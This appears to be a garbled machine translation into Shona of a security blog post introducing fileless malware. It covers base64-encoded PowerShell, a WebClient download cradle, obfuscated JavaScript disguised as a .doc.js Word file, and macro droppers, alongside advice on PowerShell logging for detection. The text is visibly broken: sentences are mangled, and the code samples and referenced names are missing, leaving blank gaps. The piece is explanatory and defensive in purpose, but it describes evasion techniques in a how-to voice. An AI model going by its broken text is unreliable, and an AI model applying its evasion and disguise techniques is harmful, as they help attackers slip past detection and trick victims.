Nechinyorwa ichi tinotanga nhevedzano yezvinyorwa nezve isingaite malware. Fileless yekubira mapurogiramu, anozivikanwawo seasina mafaira ekubira zvirongwa, anowanzo shandisa PowerShell paWindows masisitimu kumhanyisa chinyararire mirairo yekutsvaga uye kubvisa zvakakosha zvemukati. Kuona chiitiko chehacker pasina mafaera akashata ibasa rakaoma, nekuti ... antivirus uye mamwe akawanda ekuona masisitimu anoshanda zvichienderana nekusaina kuongororwa. Asi mashoko akanaka ndeokuti software yakadaro iripo. Semuyenzaniso, , inokwanisa kuona zvinhu zvakaipa muhurongwa hwemafaira.
Pandakatanga kuferefeta nyaya yebadass hackers, , asi maturusi chete nemapurogiramu anowanikwa pakombiyuta yemunhu wacho, ndakanga ndisingazivi kuti iyi yaizova nzira yakakurumbira yekurwisa. Security Professionals kuti izvi zvave kuita maitiro, uye - kusimbiswa kweizvi. Naizvozvo, ndakasarudza kuita nhevedzano yezvinyorwa pamusoro uyu.
Iyo Huru uye Ine Simba PowerShell
Ndakanyora nezve dzimwe pfungwa idzi pamberi muna , asi zvakanyanya zvichibva papfungwa yedzidziso. Gare gare ndakazoona , kwaunogona kuwana sampuli dzemarware "yakabatwa" musango. Ndakafunga kuyedza kushandisa saiti ino kuti ndiwane samples dzefaira isina malware. Uye ndakabudirira. Nenzira, kana iwe uchida kuenda kune yako malware yekuvhima expedition, uchafanirwa kusimbiswa neiyi saiti kuti vazive kuti uri kuita basa senyanzvi yeheti chena. Semuchengetedzi blogger, ndakaipfuudza pasina mubvunzo. Ndine chokwadi kuti unogonawo.
Pamusoro pemasampuli pachawo, pane saiti iwe unogona kuona izvo zvirongwa izvi zvinoita. Ongororo yeHybrid inomhanyisa malware mubhokisi rayo rejecha uye inotarisisa masisitimu mafoni, inomhanyisa maitiro uye network chiitiko, uye inobvisa tambo dzemavara dzinofungidzirwa. Kune mabhinari uye mamwe mafaera anogoneka, i.e. kwausingakwanise kutarisa iyo chaiyo yepamusoro-level kodhi, yakasanganiswa ongororo inosarudza kana software yacho ine hutsinye kana kungofungira zvichibva pane yayo yekumhanyisa kuita. Uye mushure meizvozvo sampuli yatoongororwa.
Munyaya yePowerShell uye mamwe magwaro emuenzaniso (Visual Basic, JavaScript, nezvimwewo), ndakakwanisa kuona iyo kodhi pachayo. Semuenzaniso, ndakaona iyi PowerShell muenzaniso:
Iwe unogona zvakare kumhanya PowerShell mu base64 encoding kuti usaonekwe. Cherechedza kushandiswa kweNoninteractive uye Hidden parameters.
Kana iwe wakaverenga zvandakatumira pane obfuscation, saka iwe unoziva kuti iyo -e sarudzo inotsanangura kuti zvirimo zviri base64 encoded. Nenzira, kuongororwa kwehybrid kunobatsirawo neizvi nekugadzirisa zvese kumashure. Kana iwe uchida kuyedza decoding base64 PowerShell (inozonzi PS) iwe pachako, unofanirwa kumhanya uyu murairo:
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))Enda zvakadzama
Ndakagadzirisa script yedu yePS ndichishandisa nzira iyi, pazasi pane chinyorwa chechirongwa, kunyangwe chakagadziridzwa neni zvishoma:
Ziva kuti iyo script yakasungirirwa kusvika musi waGunyana 4, 2017 uye yakafambiswa makiki emusangano.
Ndakanyora nezve style iyi yekurwisa mukati , umo base64 encoded script pachayo inotakura vasipo malware kubva kune imwe saiti, uchishandisa .Net Framework raibhurari yeWebClient chinhu kuita zvinorema kusimudza.
Ko sei?
Zvekuchengetedza software yekutarisa Windows chiitiko matanda kana firewall, base64 encoding inodzivirira tambo "WebClient" kuti isaonekwa neyakajeka mavara maitiro kudzivirira kubva pakuita chikumbiro chakadaro chewebhu. Uye sezvo "huipi" hwese hwemarware hunobva hwatorwa ndokupfuudzwa muPowerShell yedu, nzira iyi nokudaro inotibvumira kunzvenga zvachose kuonekwa. Kana kuti, ndizvo zvandaifunga pakutanga.
Zvinoitika kuti neWindows PowerShell Advanced Logging inogoneswa (ona chinyorwa changu), iwe unozokwanisa kuona mutsara wakarodha mugiyo rechiitiko. ndakafanana ) Ndinofunga Microsoft inofanirwa kugonesa iyi nhanho yekutema matanda nekusarudzika. Naizvozvo, nekurebesa matanda kwakagoneswa, isu tichaona muWindows chiitiko chinyorwa chikumbiro chakazara chekudhawunirodha kubva kuPS script zvinoenderana nemuenzaniso watakakurukura pamusoro. Naizvozvo, zvine musoro kuimutsa, haubvumi here?
Ngatiwedzerei mamwe mascenario
Hackers vanovanza zvine hungwaru PowerShell kurwiswa muMicrosoft Office macros yakanyorwa muVisual Basic nemimwe mitauro yekunyora. Pfungwa ndeyokuti munhu anenge abatwa anogamuchira meseji, semuenzaniso kubva kubasa rekutumira, ine mushumo wakabatanidzwa mu.doc fomati. Iwe unovhura gwaro iri rine macro, uye rinopedzisira rava kuvhura iyo yakaipa PowerShell pachayo.
Kazhinji iyo Visual Basic script pachayo yakavharwa kuitira kuti inonzvenga zvakasununguka antivirus uye mamwe malware scanner. Mumweya wezviri pamusoro, ndakafunga kukodha iyo PowerShell iri pamusoro muJavaScript sechiitwa. Pazasi pane mhedzisiro yebasa rangu:
Yakavharwa JavaScript inovanza PowerShell yedu. Real hackers vanoita izvi kamwe kana kaviri.
Iyi ndiyo imwe nzira yandaona ichiyangarara pawebhu: kushandisa Wscript.Shell kumhanyisa PowerShell ine coded. Nenzira, JavaScript pachayo ndiyo kuendesa malware. Mazhinji mavhezheni eWindows akavaka-mukati , iyo pachayo inogona kumhanya JS.
Kwatiri isu, iyo yakashata JS script yakamisikidzwa sefaira ine .doc.js extension. Windows inongoratidza chete suffix yekutanga, saka ichaonekwa kune akabatwa segwaro reShoko.
Iyo JS icon inongowanikwa mupumburu icon. Hazvishamisi kuti vanhu vazhinji vachavhura chibatanidzwa ichi vachifunga kuti igwaro reShoko.
Mumuenzaniso wangu, ndakagadzirisa PowerShell pamusoro kuti nditore script kubva pawebhusaiti yangu. Iyo iri kure PS script inongodhinda "Evil Malware". Sezvaunogona kuona, haana kana munhu akaipa. Ehe, hackers chaivo vanofarira kuwana mukana kune laptop kana sevha, toti, kuburikidza negomba rekuraira. Muchinyorwa chinotevera, ini ndinokuratidza maitiro ekuita izvi uchishandisa PowerShell Empire.
Ndinovimba kuti pachinyorwa chekutanga chenhanganyaya hatina kunyura zvakanyanya mumusoro wenyaya. Zvino ini ndichakurega iwe utore mweya wekufema, uye nguva inotevera tichatanga kutarisa mienzaniso chaiyo yekurwiswa uchishandisa fileless malware pasina chero asina kufanira ekutanga mazwi kana kugadzirira.
Source: www.habr.com